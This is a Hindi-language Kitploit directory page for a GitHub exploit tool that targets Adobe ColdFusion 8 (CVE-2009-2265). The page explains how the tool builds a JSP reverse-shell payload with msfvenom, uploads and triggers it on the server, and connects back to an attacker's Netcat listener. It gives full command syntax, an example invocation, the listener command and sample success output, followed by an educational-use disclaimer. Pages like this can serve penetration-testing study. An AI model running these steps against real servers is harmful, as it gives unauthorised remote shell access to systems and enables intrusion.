Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - रिमोट कमांड निष्पादन (RCE) | Kitploit
उपकरण/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - रिमोट कमांड निष्पादन (RCE)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं
साझा करें

Adobe ColdFusion 8 - दूरस्थ कमांड निष्पादन (RCE) शोषण

अवलोकन

यह शोषण Adobe ColdFusion 8 (CVE-2009-2265) में एक ज्ञात कमजोरी को लक्षित करता है। यह एक दुर्भावनापूर्ण JSP पेलोड अपलोड करके दूरस्थ कमांड निष्पादन (RCE) को सक्षम करता है जो एक रिवर्स शेल कनेक्शन स्थापित करता है।


शोषण विवरण

  • CVE: CVE-2009-2265
  • कमजोरी: Adobe ColdFusion 8 में फ़ाइल अपलोड का अनुचित प्रबंधन।
  • प्रभावित संस्करण: Adobe ColdFusion 8।
  • प्रभाव: हमलावरों को सर्वर पर मनमानी कमांड निष्पादित करने की अनुमति देता है।

विशेषताएँ

  1. स्वचालित रूप से msfvenom का उपयोग करके JSP पेलोड उत्पन्न करता है।
  • मल्टीपार्ट POST अनुरोध का उपयोग करके पेलोड अपलोड करता है।
  • रिवर्स शेल स्थापित करने के लिए पेलोड को ट्रिगर करता है।
  • निष्पादन के बाद स्थानीय पेलोड फ़ाइलों को स्वचालित रूप से साफ करता है।

  • उपयोग

    इस शोषण का उपयोग करने के लिए, आपको निम्नलिखित की आवश्यकता है:

    • एक Kali Linux मशीन या इसी तरह का पैनेट्रेशन टेस्टिंग वातावरण।
    • निर्दिष्ट पोर्ट पर सुनने के लिए Netcat स्थापित हो।
    • एक कमजोर Adobe ColdFusion 8 सर्वर।

    कमांड सिंटैक्स

    root@kitploit:~
    ./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
    

    तर्क

    • -l <LHOST>: स्थानीय हमलावर IP (जैसे, 10.10.16.5)।
    • -p <LPORT>: रिवर्स शेल के लिए स्थानीय हमलावर पोर्ट (जैसे, 9001)।
    • -r <RHOST>: दूरस्थ लक्ष्य IP (जैसे, 10.10.10.11)।
    • -q <RPORT>: दूरस्थ लक्ष्य पोर्ट जहाँ ColdFusion चल रहा है (जैसे, 8500)।

    उदाहरण उपयोग

    root@kitploit:~
    ./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
    
    1. अपने हमलावर मशीन पर एक लिसनर प्रारंभ करें:

      root@kitploit:~
      nc -lnvp 9001
      
    2. उपयुक्त तर्कों के साथ शोषण चलाएँ।

    3. एक बार निष्पादित होने पर, पेलोड आपके लिसनर से वापस जुड़ जाएगा।


    यह कैसे काम करता है

    1. पेलोड उत्पन्न करें: स्क्रिप्ट msfvenom का उपयोग करके एक दुर्भावनापूर्ण JSP पेलोड उत्पन्न करती है। पेलोड निर्दिष्ट LHOST और LPORT पर एक रिवर्स शेल आरंभ करता है।
    2. पेलोड अपलोड करें: पेलोड को POST अनुरोध का उपयोग करके कमजोर ColdFusion सर्वर पर अपलोड किया जाता है।
    3. पेलोड ट्रिगर करें: अपलोड किए गए पेलोड को फ़ाइल के URL पर GET अनुरोध भेजकर निष्पादित किया जाता है।
    4. रिवर्स शेल स्थापित करें: एक रिवर्स शेल स्थापित किया जाता है, जो हमलावर को लक्ष्य सिस्टम तक पहुँच प्रदान करता है।

    आवश्यकताएँ

    • msfvenom पेलोड निर्माण के लिए।
    • curl फ़ाइल अपलोड और पेलोड ट्रिगर करने के लिए।
    • nc (Netcat) रिवर्स शेल कनेक्शन सुनने के लिए।

    उदाहरण आउटपुट

    root@kitploit:~
    [+] Generating JSP reverse shell payload...
    [+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
    [+] Uploading the payload to the target...
    [+] Server response:
        <script type="text/javascript">
            window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
        </script>
    [+] Waiting for the Netcat listener to start on port 9001...
    [+] Netcat listener detected running on port 9001!
    [+] Attempting to trigger the payload...
    [+] Payload triggered successfully. Check your listener for the reverse shell.
    [+] Cleaning up local files...
    [+] Done!
    

    अस्वीकरण

    यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। उन सिस्टम पर इस शोषण का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध और अनैतिक है।


    लेखक

    [0xDTC] द्वारा विकसित।

    टूल डाउनलोड करें